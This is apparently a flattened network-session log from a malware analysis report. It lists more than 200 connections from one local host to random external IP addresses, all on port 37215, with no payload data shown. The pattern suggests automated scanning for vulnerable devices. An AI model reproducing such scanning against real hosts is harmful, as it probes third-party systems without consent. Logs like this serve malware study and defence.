                                              12716192.168.2.1541468181.24.164.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12717192.168.2.155540037.6.44.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12718192.168.2.1546422190.6.149.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12719192.168.2.1540820122.226.214.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12720192.168.2.155135245.55.176.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12721192.168.2.155938631.127.71.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12722192.168.2.1540750197.227.242.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12723192.168.2.1547090138.166.95.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12724192.168.2.1545456121.211.194.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12725192.168.2.1538770138.171.3.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12726192.168.2.155750631.138.34.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12727192.168.2.155388445.172.3.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12728192.168.2.1548018186.0.177.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12729192.168.2.1533598186.198.219.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12730192.168.2.1550170181.108.130.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12731192.168.2.154185637.61.66.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12732192.168.2.1548912121.167.232.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12733192.168.2.1550218122.244.237.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12734192.168.2.1543986157.142.180.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12735192.168.2.1553504121.53.113.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12736192.168.2.155274894.53.128.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12737192.168.2.1539644190.161.69.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12738192.168.2.1559934156.252.37.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12739192.168.2.1547400138.89.160.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12740192.168.2.1558404156.233.217.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12741192.168.2.1538716181.48.240.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12742192.168.2.1555410102.79.218.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12743192.168.2.155860494.231.237.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12744192.168.2.1553064197.154.133.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12745192.168.2.1552174122.19.198.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12746192.168.2.153310870.195.57.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12747192.168.2.1536500197.213.29.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12748192.168.2.155217241.53.201.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12749192.168.2.155297487.201.14.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12750192.168.2.154661041.226.208.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12751192.168.2.1557514121.141.154.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12752192.168.2.1538102121.42.201.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12753192.168.2.154859445.35.140.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12754192.168.2.1546310156.173.196.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12755192.168.2.153702641.118.153.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12756192.168.2.1536864102.9.212.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12757192.168.2.1558606222.52.114.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12758192.168.2.154102045.80.132.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12759192.168.2.155890094.13.223.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12760192.168.2.1548750190.243.91.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12761192.168.2.1545914156.35.96.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12762192.168.2.1534026121.127.77.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12763192.168.2.1549728110.177.85.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12764192.168.2.154502837.220.101.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12765192.168.2.1560704186.161.90.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12766192.168.2.1549366190.163.172.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12767192.168.2.153768845.91.35.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12768192.168.2.154061237.182.120.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12769192.168.2.1538708220.17.31.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12770192.168.2.1533680138.156.135.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12771192.168.2.154452094.233.1.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12772192.168.2.155664841.14.246.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12773192.168.2.154689645.62.99.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12774192.168.2.1545362121.2.175.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12775192.168.2.1537340138.69.101.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12776192.168.2.154191245.119.64.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12777192.168.2.153277045.228.94.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12778192.168.2.154377041.50.135.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12779192.168.2.1544604186.206.65.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12780192.168.2.155545631.213.7.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12781192.168.2.1538234156.115.94.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12782192.168.2.1534192122.147.227.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12783192.168.2.1542500138.205.62.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12784192.168.2.153927637.160.48.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12785192.168.2.154467837.86.163.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12786192.168.2.1535000181.88.140.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12787192.168.2.1539132181.81.105.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12788192.168.2.154920841.70.180.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12789192.168.2.1558262171.45.77.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12790192.168.2.154104431.112.180.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12791192.168.2.1535304197.214.201.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12792192.168.2.1540992121.226.11.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12793192.168.2.1534392156.184.89.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12794192.168.2.1555354121.225.253.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12795192.168.2.1547626181.188.242.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12796192.168.2.1549348122.185.244.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12797192.168.2.1555950186.55.123.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12798192.168.2.154133831.58.155.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12799192.168.2.153965845.105.41.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12800192.168.2.154310437.225.180.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12801192.168.2.153935641.8.52.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12802192.168.2.1553704222.137.208.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12803192.168.2.1552046138.231.171.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12804192.168.2.1549346186.224.72.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12805192.168.2.1532822156.92.196.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12806192.168.2.1558348121.23.82.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12807192.168.2.154775294.244.245.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12808192.168.2.1554388102.207.169.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12809192.168.2.1560204181.12.88.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12810192.168.2.155353441.235.151.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12811192.168.2.1542318121.236.151.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12812192.168.2.153319294.166.123.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12813192.168.2.1552046102.224.165.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12814192.168.2.1535208157.253.123.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12815192.168.2.154235637.210.72.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12816192.168.2.153547231.226.130.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12817192.168.2.1554330157.39.23.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12818192.168.2.1553386138.62.201.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12819192.168.2.155875045.78.185.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12820192.168.2.1536960190.120.224.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12821192.168.2.1556266102.69.7.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12822192.168.2.154634237.80.217.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12823192.168.2.1534610102.191.179.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12824192.168.2.1538934181.187.174.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12825192.168.2.1552082138.180.91.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12826192.168.2.155822637.47.201.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12827192.168.2.1533638138.208.155.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12828192.168.2.1538246122.70.70.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12829192.168.2.1552318156.105.56.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12830192.168.2.1554250138.9.238.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12831192.168.2.153910494.18.181.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12832192.168.2.1551844156.235.170.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12833192.168.2.1539888156.203.181.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12834192.168.2.155363631.66.98.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12835192.168.2.156008294.89.167.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12836192.168.2.1535866102.237.78.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12837192.168.2.154152031.203.197.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12838192.168.2.155670645.109.56.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12839192.168.2.1539426157.141.84.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12840192.168.2.154930045.109.154.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12841192.168.2.1555548181.122.27.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12842192.168.2.154211037.157.113.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12843192.168.2.1536404157.125.202.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12844192.168.2.155898241.222.8.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12845192.168.2.1539588190.161.13.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12846192.168.2.1541902197.60.2.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12847192.168.2.1556798197.190.207.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12848192.168.2.1548056181.55.133.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12849192.168.2.1555820197.188.21.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12850192.168.2.155786294.161.181.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12851192.168.2.1547050186.164.89.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12852192.168.2.154892841.180.20.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12853192.168.2.1544272156.122.108.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12854192.168.2.154411894.44.30.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12855192.168.2.1537574181.139.68.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12856192.168.2.1546336121.19.180.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12857192.168.2.1548174156.117.123.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12858192.168.2.153683694.71.213.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12859192.168.2.1537970121.64.201.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12860192.168.2.154508241.163.81.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12861192.168.2.155113694.240.148.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12862192.168.2.155130431.51.124.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12863192.168.2.1546218102.156.156.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12864192.168.2.154281637.239.181.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12865192.168.2.1545276157.214.8.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12866192.168.2.1546976190.251.118.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12867192.168.2.1553082121.225.43.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12868192.168.2.1559418121.251.252.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12869192.168.2.1542086186.72.179.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12870192.168.2.155422645.33.162.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12871192.168.2.1537208197.245.121.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12872192.168.2.1560158156.243.245.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12873192.168.2.153747241.214.208.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12874192.168.2.155629294.16.94.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12875192.168.2.1560176185.8.161.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12876192.168.2.1534184187.171.62.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12877192.168.2.1551782138.125.58.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12878192.168.2.1539608181.194.34.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12879192.168.2.153505837.222.178.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12880192.168.2.153755245.56.0.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12881192.168.2.1547360122.36.0.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12882192.168.2.1541280190.26.216.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12883192.168.2.1553454121.154.94.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12884192.168.2.1559810157.176.107.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12885192.168.2.1543160138.39.148.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12886192.168.2.1546062181.130.2.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12887192.168.2.1537642138.22.181.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12888192.168.2.1555664138.29.167.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12889192.168.2.155990231.74.189.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12890192.168.2.154646837.182.236.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12891192.168.2.1542838102.72.27.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12892192.168.2.1546990102.87.140.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12893192.168.2.156057045.188.17.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12894192.168.2.1555784186.230.199.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12895192.168.2.154035837.153.220.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12896192.168.2.155782041.30.78.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12897192.168.2.1554516197.240.80.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12898192.168.2.154801245.50.165.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12899192.168.2.1550788190.107.210.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12900192.168.2.1553936122.136.184.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12901192.168.2.1559522181.111.234.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12902192.168.2.1549034190.10.238.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12903192.168.2.1536432138.39.112.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12904192.168.2.156081837.179.126.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12905192.168.2.1549856152.36.11.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12906192.168.2.156055631.50.92.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12907192.168.2.1547006181.163.216.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12908192.168.2.1543842122.198.70.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12909192.168.2.1539968160.150.39.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12910192.168.2.1546730175.242.127.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12911192.168.2.1555408102.37.58.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12912192.168.2.1533856125.71.104.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12913192.168.2.1550328102.15.193.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12914192.168.2.1547966122.68.1.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12915192.168.2.1547038186.110.89.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12916192.168.2.1555486181.220.17.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12917192.168.2.1537488157.113.96.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12918192.168.2.1543986122.175.244.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12919192.168.2.1551276181.151.99.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12920192.168.2.1541374190.19.200.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12921192.168.2.1541960102.30.86.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12922192.168.2.1550856121.102.138.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12923192.168.2.1547460122.45.70.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12924192.168.2.1558176157.236.8.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12925192.168.2.1556936102.144.16.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12926192.168.2.1556742156.150.68.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12927192.168.2.1534374156.146.134.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12928192.168.2.1541990102.60.219.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12929192.168.2.1541434190.130.25.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12930192.168.2.155060845.40.198.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12931192.168.2.1545826190.233.22.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12932192.168.2.1533508186.139.145.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12933192.168.2.154905241.153.69.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12934192.168.2.1553058122.25.81.7437215
